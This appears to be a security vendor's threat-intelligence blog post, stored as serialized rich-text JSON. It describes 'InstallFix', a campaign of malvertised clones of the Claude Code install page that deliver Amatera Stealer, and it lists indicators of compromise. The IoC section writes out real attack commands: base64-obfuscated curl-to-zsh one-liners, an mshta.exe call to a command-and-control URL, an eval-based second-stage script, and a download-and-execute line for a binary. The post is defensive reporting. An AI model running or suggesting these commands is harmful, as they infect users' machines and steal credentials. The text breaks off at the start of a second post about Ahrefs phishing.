",[],{},{"nodeType":1468,"data":7597,"content":7598},{},[7599],{"nodeType":1257,"value":7600,"marks":7601,"data":7602},"A new campaign targeting Claude Code",[],{},{"nodeType":1258,"data":7604,"content":7605},{},[7606],{"nodeType":1257,"value":7607,"marks":7608,"data":7609},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":1258,"data":7611,"content":7612},{},[7613],{"nodeType":1257,"value":7614,"marks":7615,"data":7616},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":1258,"data":7618,"content":7619},{},[7620],{"nodeType":1257,"value":7621,"marks":7622,"data":7623},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. 
",[],{},{"nodeType":1258,"data":7625,"content":7626},{},[7627],{"nodeType":1257,"value":7628,"marks":7629,"data":7630},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":1258,"data":7632,"content":7633},{},[7634],{"nodeType":1257,"value":7635,"marks":7636,"data":7637},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":1335,"data":7639,"content":7643},{"target":7640},{"sys":7641},{"id":7642,"type":1340,"linkType":1341},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":1335,"data":7645,"content":7649},{"target":7646},{"sys":7647},{"id":7648,"type":1340,"linkType":1341},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":1258,"data":7651,"content":7652},{},[7653],{"nodeType":1257,"value":7654,"marks":7655,"data":7656},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. 
",[],{},{"nodeType":1335,"data":7658,"content":7662},{"target":7659},{"sys":7660},{"id":7661,"type":1340,"linkType":1341},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":1468,"data":7664,"content":7665},{},[7666],{"nodeType":1257,"value":7667,"marks":7668,"data":7669},"Distribution via Google Ads",[],{},{"nodeType":1258,"data":7671,"content":7672},{},[7673],{"nodeType":1257,"value":7674,"marks":7675,"data":7676},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":1335,"data":7678,"content":7682},{"target":7679},{"sys":7680},{"id":7681,"type":1340,"linkType":1341},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":1335,"data":7684,"content":7688},{"target":7685},{"sys":7686},{"id":7687,"type":1340,"linkType":1341},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":1335,"data":7690,"content":7694},{"target":7691},{"sys":7692},{"id":7693,"type":1340,"linkType":1341},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":1335,"data":7696,"content":7700},{"target":7697},{"sys":7698},{"id":7699,"type":1340,"linkType":1341},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":1258,"data":7702,"content":7703},{},[7704,7708,7717],{"nodeType":1257,"value":7705,"marks":7706,"data":7707},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. 
This is one of the reasons that attackers are ",[],{},{"nodeType":1364,"data":7709,"content":7711},{"uri":7710},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[7712],{"nodeType":1257,"value":7713,"marks":7714,"data":7716},"doubling down on targeting ad manager accounts",[7715],{"type":1372},{},{"nodeType":1257,"value":7718,"marks":7719,"data":7720}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":1258,"data":7722,"content":7723},{},[7724,7729],{"nodeType":1257,"value":7725,"marks":7726,"data":7728},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[7727],{"type":1318},{},{"nodeType":1257,"value":7730,"marks":7731,"data":7732},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":1258,"data":7734,"content":7735},{},[7736],{"nodeType":1257,"value":7737,"marks":7738,"data":7739},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. 
Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":1335,"data":7741,"content":7745},{"target":7742},{"sys":7743},{"id":7744,"type":1340,"linkType":1341},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":1468,"data":7747,"content":7748},{},[7749],{"nodeType":1257,"value":7750,"marks":7751,"data":7752},"The payload",[],{},{"nodeType":1258,"data":7754,"content":7755},{},[7756],{"nodeType":1257,"value":7757,"marks":7758,"data":7759},"On Windows, the malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution (the PIDs shown are from our analysis run and will differ on other hosts):",[],{},{"nodeType":1884,"data":7761,"content":7762},{},[7763,7773,7783],{"nodeType":1888,"data":7764,"content":7765},{},[7766],{"nodeType":1258,"data":7767,"content":7768},{},[7769],{"nodeType":1257,"value":7770,"marks":7771,"data":7772},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1888,"data":7774,"content":7775},{},[7776],{"nodeType":1258,"data":7777,"content":7778},{},[7779],{"nodeType":1257,"value":7780,"marks":7781,"data":7782},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1888,"data":7784,"content":7785},{},[7786],{"nodeType":1258,"data":7787,"content":7788},{},[7789],{"nodeType":1257,"value":7790,"marks":7791,"data":7792},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":1258,"data":7794,"content":7795},{},[7796],{"nodeType":1257,"value":7797,"marks":7798,"data":7799},"The macOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":1258,"data":7801,"content":7802},{},[7803],{"nodeType":1257,"value":7804,"marks":7805,"data":7807},"You can see the full list of IoCs 
at the end of the blog.   ",[7806],{"type":1318},{},{"nodeType":1258,"data":7809,"content":7810},{},[7811],{"nodeType":1257,"value":7812,"marks":7813,"data":7814},"Our analysis shows that the payload, retrieved from the command-and-control domain claude[.]update-version[.]com, matches the YARA signatures for the Amatera Stealer malware.",[],{},{"nodeType":1335,"data":7816,"content":7820},{"target":7817},{"sys":7818},{"id":7819,"type":1340,"linkType":1341},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":1258,"data":7822,"content":7823},{},[7824],{"nodeType":1257,"value":7825,"marks":7826,"data":7827},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":1335,"data":7829,"content":7833},{"target":7830},{"sys":7831},{"id":7832,"type":1340,"linkType":1341},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":1468,"data":7835,"content":7836},{},[7837],{"nodeType":1257,"value":7838,"marks":7839,"data":7840},"Abusing legitimate hosting services",[],{},{"nodeType":1258,"data":7842,"content":7843},{},[7844,7848,7856],{"nodeType":1257,"value":7845,"marks":7846,"data":7847},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":1364,"data":7849,"content":7850},{"uri":2681},[7851],{"nodeType":1257,"value":7852,"marks":7853,"data":7855},"detection evasion technique",[7854],{"type":1372},{},{"nodeType":1257,"value":6166,"marks":7857,"data":7858},[],{},{"nodeType":1258,"data":7860,"content":7861},{},[7862],{"nodeType":1257,"value":7863,"marks":7864,"data":7865},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. 
",[],{},{"nodeType":1307,"data":7867,"content":7868},{},[],{"nodeType":1311,"data":7870,"content":7871},{},[7872],{"nodeType":1257,"value":7873,"marks":7874,"data":7876},"A broader trend",[7875],{"type":1318},{},{"nodeType":1258,"data":7878,"content":7879},{},[7880],{"nodeType":1257,"value":7881,"marks":7882,"data":7883},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1884,"data":7885,"content":7886},{},[7887,7910,7933,7956],{"nodeType":1888,"data":7888,"content":7889},{},[7890],{"nodeType":1258,"data":7891,"content":7892},{},[7893,7896,7906],{"nodeType":1257,"value":31,"marks":7894,"data":7895},[],{},{"nodeType":1364,"data":7897,"content":7899},{"uri":7898},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[7900],{"nodeType":1257,"value":7901,"marks":7902,"data":7905},"Fake Claude artifacts used in traditional ClickFix lures",[7903,7904],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7907,"marks":7908,"data":7909},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. 
These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1888,"data":7911,"content":7912},{},[7913],{"nodeType":1258,"data":7914,"content":7915},{},[7916,7919,7929],{"nodeType":1257,"value":31,"marks":7917,"data":7918},[],{},{"nodeType":1364,"data":7920,"content":7922},{"uri":7921},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[7923],{"nodeType":1257,"value":7924,"marks":7925,"data":7928},"Fake Homebrew installation pages",[7926,7927],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7930,"marks":7931,"data":7932},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1888,"data":7934,"content":7935},{},[7936],{"nodeType":1258,"data":7937,"content":7938},{},[7939,7942,7952],{"nodeType":1257,"value":31,"marks":7940,"data":7941},[],{},{"nodeType":1364,"data":7943,"content":7945},{"uri":7944},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[7946],{"nodeType":1257,"value":7947,"marks":7948,"data":7951},"Fake OpenClaw installers on GitHub",[7949,7950],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7953,"marks":7954,"data":7955},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1888,"data":7957,"content":7958},{},[7959],{"nodeType":1258,"data":7960,"content":7961},{},[7962,7965,7975],{"nodeType":1257,"value":31,"marks":7963,"data":7964},[],{},{"nodeType":1364,"data":7966,"content":7968},{"uri":7967},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[7969],{"nodeType":1257,"value":7970,"marks":7971,"data":7974},"Trojanised npm packages",[7972,7973],{"type":1372},{"type":1318},{},{"nodeType":1257,"value":7976,"marks":7977,"data":7978},": Malicious packages mimicking Claude Code's 
official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":1258,"data":7980,"content":7981},{},[7982],{"nodeType":1257,"value":7983,"marks":7984,"data":7985},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after a user has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. Attackers clone these real sites because doing so lets them intercept users entering common search terms. ",[],{},{"nodeType":1335,"data":7987,"content":7991},{"target":7988},{"sys":7989},{"id":7990,"type":1340,"linkType":1341},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":1307,"data":7993,"content":7994},{},[],{"nodeType":1468,"data":7996,"content":7997},{},[7998],{"nodeType":1257,"value":7999,"marks":8000,"data":8002},"How Push detects InstallFix",[8001],{"type":1318},{},{"nodeType":1258,"data":8004,"content":8005},{},[8006],{"nodeType":1257,"value":8007,"marks":8008,"data":8009},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":1258,"data":8011,"content":8012},{},[8013],{"nodeType":1257,"value":8014,"marks":8015,"data":8016},"Push sees what the user sees: the page as it renders in the browser, in real time. 
This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":1258,"data":8018,"content":8019},{},[8020],{"nodeType":1257,"value":8021,"marks":8022,"data":8023},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":1258,"data":8025,"content":8026},{},[8027,8031,8038,8041,8048,8051,8058],{"nodeType":1257,"value":8028,"marks":8029,"data":8030},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":1364,"data":8032,"content":8033},{"uri":2228},[8034],{"nodeType":1257,"value":2231,"marks":8035,"data":8037},[8036],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":8039,"data":8040},[],{},{"nodeType":1364,"data":8042,"content":8043},{"uri":3737},[8044],{"nodeType":1257,"value":3740,"marks":8045,"data":8047},[8046],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":8049,"data":8050},[],{},{"nodeType":1364,"data":8052,"content":8053},{"uri":2241},[8054],{"nodeType":1257,"value":2244,"marks":8055,"data":8057},[8056],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":8059,"data":8060},[],{},{"nodeType":1307,"data":8062,"content":8063},{},[],{"nodeType":1311,"data":8065,"content":8066},{},[8067],{"nodeType":1257,"value":2933,"marks":8068,"data":8070},[8069],{"type":1318},{},{"nodeType":1258,"data":8072,"content":8073},{},[8074,8078,8085],{"nodeType":1257,"value":8075,"marks":8076,"data":8077},"As we always say, short-lived IoCs are of limited value when tackling modern 
phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1364,"data":8079,"content":8080},{"uri":2946},[8081],{"nodeType":1257,"value":2949,"marks":8082,"data":8084},[8083],{"type":1372},{},{"nodeType":1257,"value":8086,"marks":8087,"data":8088}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":1258,"data":8090,"content":8091},{},[8092],{"nodeType":1257,"value":8093,"marks":8094,"data":8095},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":1258,"data":8097,"content":8098},{},[8099],{"nodeType":1257,"value":8100,"marks":8101,"data":8103},"Cloned domains:",[8102],{"type":1318},{},{"nodeType":1884,"data":8105,"content":8106},{},[8107,8117,8127,8137,8147,8157,8166,8176,8186,8195,8205,8215,8225,8235,8245,8255,8265,8274,8284,8294,8304],{"nodeType":1888,"data":8108,"content":8109},{},[8110],{"nodeType":1258,"data":8111,"content":8112},{},[8113],{"nodeType":1257,"value":8114,"marks":8115,"data":8116},"claud-code[.]pages[.]dev",[],{},{"nodeType":1888,"data":8118,"content":8119},{},[8120],{"nodeType":1258,"data":8121,"content":8122},{},[8123],{"nodeType":1257,"value":8124,"marks":8125,"data":8126},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8128,"content":8129},{},[8130],{"nodeType":1258,"data":8131,"content":8132},{},[8133],{"nodeType":1257,"value":8134,"marks":8135,"data":8136},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8138,"content":8139},{},[8140],{"nodeType":1258,"data":8141,"content":8142},{},[8143],{"nodeType":1257,"value":8144,"marks":8145,"data":8146},"hgjbulk.pages[.]dev",[],{},{"nodeType":1888,"data":8148,"content":8149},{},[8150],{"nodeType":1258,"data":8151,"content":8152},{},[8153],{"nodeType":1257,"value":8154,"marks":8155,"data":8156},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1888,"data":8158,"content":8159},{},[8160],{"node
Type":1258,"data":8161,"content":8162},{},[8163],{"nodeType":1257,"value":8144,"marks":8164,"data":8165},[],{},{"nodeType":1888,"data":8167,"content":8168},{},[8169],{"nodeType":1258,"data":8170,"content":8171},{},[8172],{"nodeType":1257,"value":8173,"marks":8174,"data":8175},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8177,"content":8178},{},[8179],{"nodeType":1258,"data":8180,"content":8181},{},[8182],{"nodeType":1257,"value":8183,"marks":8184,"data":8185},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1888,"data":8187,"content":8188},{},[8189],{"nodeType":1258,"data":8190,"content":8191},{},[8192],{"nodeType":1257,"value":8124,"marks":8193,"data":8194},[],{},{"nodeType":1888,"data":8196,"content":8197},{},[8198],{"nodeType":1258,"data":8199,"content":8200},{},[8201],{"nodeType":1257,"value":8202,"marks":8203,"data":8204},"cladueall[.]pages[.]dev",[],{},{"nodeType":1888,"data":8206,"content":8207},{},[8208],{"nodeType":1258,"data":8209,"content":8210},{},[8211],{"nodeType":1257,"value":8212,"marks":8213,"data":8214},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1888,"data":8216,"content":8217},{},[8218],{"nodeType":1258,"data":8219,"content":8220},{},[8221],{"nodeType":1257,"value":8222,"marks":8223,"data":8224},"myclauda[.]it[.]com",[],{},{"nodeType":1888,"data":8226,"content":8227},{},[8228],{"nodeType":1258,"data":8229,"content":8230},{},[8231],{"nodeType":1257,"value":8232,"marks":8233,"data":8234},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1888,"data":8236,"content":8237},{},[8238],{"nodeType":1258,"data":8239,"content":8240},{},[8241],{"nodeType":1257,"value":8242,"marks":8243,"data":8244},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1888,"data":8246,"content":8247},{},[8248],{"nodeType":1258,"data":8249,"content":8250},{},[8251],{"nodeType":1257,"value":8252,"marks":8253,"data":8254},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1888,"data":8256,"content":8257},{},[8258],{"nodeType":1258,
"data":8259,"content":8260},{},[8261],{"nodeType":1257,"value":8262,"marks":8263,"data":8264},"claude-code-macos[.]com",[],{},{"nodeType":1888,"data":8266,"content":8267},{},[8268],{"nodeType":1258,"data":8269,"content":8270},{},[8271],{"nodeType":1257,"value":8183,"marks":8272,"data":8273},[],{},{"nodeType":1888,"data":8275,"content":8276},{},[8277],{"nodeType":1258,"data":8278,"content":8279},{},[8280],{"nodeType":1257,"value":8281,"marks":8282,"data":8283},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8285,"content":8286},{},[8287],{"nodeType":1258,"data":8288,"content":8289},{},[8290],{"nodeType":1257,"value":8291,"marks":8292,"data":8293},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8295,"content":8296},{},[8297],{"nodeType":1258,"data":8298,"content":8299},{},[8300],{"nodeType":1257,"value":8301,"marks":8302,"data":8303},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1888,"data":8305,"content":8306},{},[8307],{"nodeType":1258,"data":8308,"content":8309},{},[8310],{"nodeType":1257,"value":8311,"marks":8312,"data":8313},"notklmalans[.]pages[.]dev",[],{},{"nodeType":1258,"data":8315,"content":8316},{},[8317],{"nodeType":1257,"value":8318,"marks":8319,"data":8321},"Domains hosting malicious 
payload:",[8320],{"type":1318},{},{"nodeType":1884,"data":8323,"content":8324},{},[8325,8335,8345],{"nodeType":1888,"data":8326,"content":8327},{},[8328],{"nodeType":1258,"data":8329,"content":8330},{},[8331],{"nodeType":1257,"value":8332,"marks":8333,"data":8334},"contatoplus[.]com",[],{},{"nodeType":1888,"data":8336,"content":8337},{},[8338],{"nodeType":1258,"data":8339,"content":8340},{},[8341],{"nodeType":1257,"value":8342,"marks":8343,"data":8344},"sarahmoftah[.]com",[],{},{"nodeType":1888,"data":8346,"content":8347},{},[8348],{"nodeType":1258,"data":8349,"content":8350},{},[8351],{"nodeType":1257,"value":8352,"marks":8353,"data":8354},"claude[.]update-version[.]com",[],{},{"nodeType":1258,"data":8356,"content":8357},{},[8358],{"nodeType":1257,"value":8359,"marks":8360,"data":8362},"Commands:",[8361],{"type":1318},{},{"nodeType":1258,"data":8364,"content":8365},{},[8366],{"nodeType":1257,"value":8367,"marks":8368,"data":8371},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[8369],{"type":8370},"code",{},{"nodeType":1258,"data":8373,"content":8374},{},[8375],{"nodeType":1257,"value":31,"marks":8376,"data":8377},[],{},{"nodeType":1258,"data":8379,"content":8380},{},[8381],{"nodeType":1257,"value":8382,"marks":8383,"data":8385},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[8384],{"type":8370},{},{"nodeType":1258,"data":8387,"content":8388},{},[8389],{"nodeType":1257,"value":8390,"marks":8391,"data":8392},"\n",[],{},{"nodeType":1258,"data":8394,"content":8395},{},[8396],{"nodeType":1257,"value":8397,"marks":8398,"data":8400},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude 
",[8399],{"type":8370},{},{"nodeType":1258,"data":8402,"content":8403},{},[8404,8407],{"nodeType":1257,"value":8390,"marks":8405,"data":8406},[],{},{"nodeType":1257,"value":8408,"marks":8409,"data":8411},"Base64 decoded url:",[8410],{"type":1318},{},{"nodeType":1258,"data":8413,"content":8414},{},[8415],{"nodeType":1257,"value":8416,"marks":8417,"data":8419},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[8418],{"type":8370},{},{"nodeType":1258,"data":8421,"content":8422},{},[8423],{"nodeType":1257,"value":31,"marks":8424,"data":8425},[],{},{"nodeType":1258,"data":8427,"content":8428},{},[8429],{"nodeType":1257,"value":8430,"marks":8431,"data":8433},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[8432],{"type":8370},{},{"nodeType":1258,"data":8435,"content":8436},{},[8437,8440],{"nodeType":1257,"value":8390,"marks":8438,"data":8439},[],{},{"nodeType":1257,"value":8441,"marks":8442,"data":8444},"Second stage:",[8443],{"type":1318},{},{"nodeType":1258,"data":8446,"content":8447},{},[8448],{"nodeType":1257,"value":8449,"marks":8450,"data":8452},"#!/bin/zsh",[8451],{"type":8370},{},{"nodeType":1258,"data":8454,"content":8455},{},[8456],{"nodeType":1257,"value":8457,"marks":8458,"data":8460},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | 
gunzip",[8459],{"type":8370},{},{"nodeType":1258,"data":8462,"content":8463},{},[8464],{"nodeType":1257,"value":8465,"marks":8466,"data":8468},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[8467],{"type":8370},{},{"nodeType":1258,"data":8470,"content":8471},{},[8472],{"nodeType":1257,"value":8473,"marks":8474,"data":8476},"PAYLOAD_END",[8475],{"type":8370},{},{"nodeType":1258,"data":8478,"content":8479},{},[8480],{"nodeType":1257,"value":2032,"marks":8481,"data":8483},[8482],{"type":8370},{},{"nodeType":1258,"data":8485,"content":8486},{},[8487],{"nodeType":1257,"value":8488,"marks":8489,"data":8491},"eval \"$mkgrc9\"",[8490],{"type":8370},{},{"nodeType":1258,"data":8493,"content":8494},{},[8495,8498],{"nodeType":1257,"value":8390,"marks":8496,"data":8497},[],{},{"nodeType":1257,"value":8499,"marks":8500,"data":8502},"Binaries:",[8501],{"type":1318},{},{"nodeType":1258,"data":8504,"content":8505},{},[8506],{"nodeType":1257,"value":8449,"marks":8507,"data":8509},[8508],{"type":8370},{},{"nodeType":1258,"data":8511,"content":8512},{},[8513],{"nodeType":1257,"value":8514,"marks":8515,"data":8517},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[8516],{"type":8370},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":8523},[8524,8526],{"sys":8525,"name":1270},{"id":1269},{"sys":8527,"name":1274},{"id":1273},{"items":8529},[8530],{"fullName":8531,"firstName":8532,"jobTitle":8533,"profilePicture":8534},"Jacques Louw","Jacques","Co-founder / 
CRO",{"url":8535},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1278,"sys":8537,"content":8539,"title":9139,"synopsis":9140,"hashTags":118,"publishedDate":9141,"slug":9142,"tagsCollection":9143,"authorsCollection":9149},{"id":8538},"2YmiesBvJHGw4wiKEKzLUq",{"json":8540},{"nodeType":1259,"data":8541,"content":8542},{},[8543,8550,8557,8606,8612,8619,8626,8632,8638,8644,8647,8655,8662,8668,8675,8681,8687,8694,8700,8717,8720,8728,8735,8742,8749,8756,8762,8780,8783,8791,8798,8854,8861,8868,8871,8878,8885,8892,8899,8925,8928,8935,8951,8958,9001,9008,9051,9058,9131],{"nodeType":1258,"data":8544,"content":8545},{},[8546],{"nodeType":1257,"value":8547,"marks":8548,"data":8549},"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks ultimately serve up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",[],{},{"nodeType":1258,"data":8551,"content":8552},{},[8553],{"nodeType":1257,"value":8554,"marks":8555,"data":8556},"Most recently, we reported on:",[],{},{"nodeType":1884,"data":8558,"content":8559},{},[8560,8583],{"nodeType":1888,"data":8561,"content":8562},{},[8563],{"nodeType":1258,"data":8564,"content":8565},{},[8566,8570,8579],{"nodeType":1257,"value":8567,"marks":8568,"data":8569},"A campaign running ",[],{},{"nodeType":1364,"data":8571,"content":8573},{"uri":8572},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts/",[8574],{"nodeType":1257,"value":8575,"marks":8576,"data":8578},"fake malvertising ads for “Google Ads”",[8577],{"type":1372},{},{"nodeType":1257,"value":8580,"marks":8581,"data":8582}," in Google Search. 
",[],{},{"nodeType":1888,"data":8584,"content":8585},{},[8586],{"nodeType":1258,"data":8587,"content":8588},{},[8589,8593,8602],{"nodeType":1257,"value":8590,"marks":8591,"data":8592},"A campaign using sophisticated ",[],{},{"nodeType":1364,"data":8594,"content":8596},{"uri":8595},"https://pushsecurity.com/blog/uncovering-a-calendly-themed-phishing-campaign/",[8597],{"nodeType":1257,"value":8598,"marks":8599,"data":8601},"Calendly-themed phishing lures",[8600],{"type":1372},{},{"nodeType":1257,"value":8603,"marks":8604,"data":8605}," targeting marketing professionals.",[],{},{"nodeType":1335,"data":8607,"content":8611},{"target":8608},{"sys":8609},{"id":8610,"type":1340,"linkType":1341},"1ThnhFZQIhzV179qclvzFH",[],{"nodeType":1258,"data":8613,"content":8614},{},[8615],{"nodeType":1257,"value":8616,"marks":8617,"data":8618},"Now, we’ve seen the Google Ads malvertising campaign expand to run additional ads impersonating Ahrefs, an AI marketing platform. Crucially, employees with access to Ahrefs are highly likely to also have access to Google Ads, meaning that attackers can reliably target Google accounts via Ahrefs. ",[],{},{"nodeType":1258,"data":8620,"content":8621},{},[8622],{"nodeType":1257,"value":8623,"marks":8624,"data":8625},"You can see a demo of the phishing chain below. 
",[],{},{"nodeType":1335,"data":8627,"content":8631},{"target":8628},{"sys":8629},{"id":8630,"type":1340,"linkType":1341},"2XjyySGldgl9uPA7CZRms8",[],{"nodeType":1335,"data":8633,"content":8637},{"target":8634},{"sys":8635},{"id":8636,"type":1340,"linkType":1341},"yB12nGF91iq15GoHWItaX",[],{"nodeType":1335,"data":8639,"content":8643},{"target":8640},{"sys":8641},{"id":8642,"type":1340,"linkType":1341},"2NK29DaTd93kOctyWxV0RT",[],{"nodeType":1307,"data":8645,"content":8646},{},[],{"nodeType":1311,"data":8648,"content":8649},{},[8650],{"nodeType":1257,"value":8651,"marks":8652,"data":8654},"Attack breakdown",[8653],{"type":1318},{},{"nodeType":1258,"data":8656,"content":8657},{},[8658],{"nodeType":1257,"value":8659,"marks":8660,"data":8661},"Users searching for “ahrefs” on Google Search were served with a fake ad impersonating Ahrefs, hosted on Squarespace, a legitimate website building and hosting platform. Previously, we’d seen this campaign use hosting sites Odoo and Kartra to similar effect. 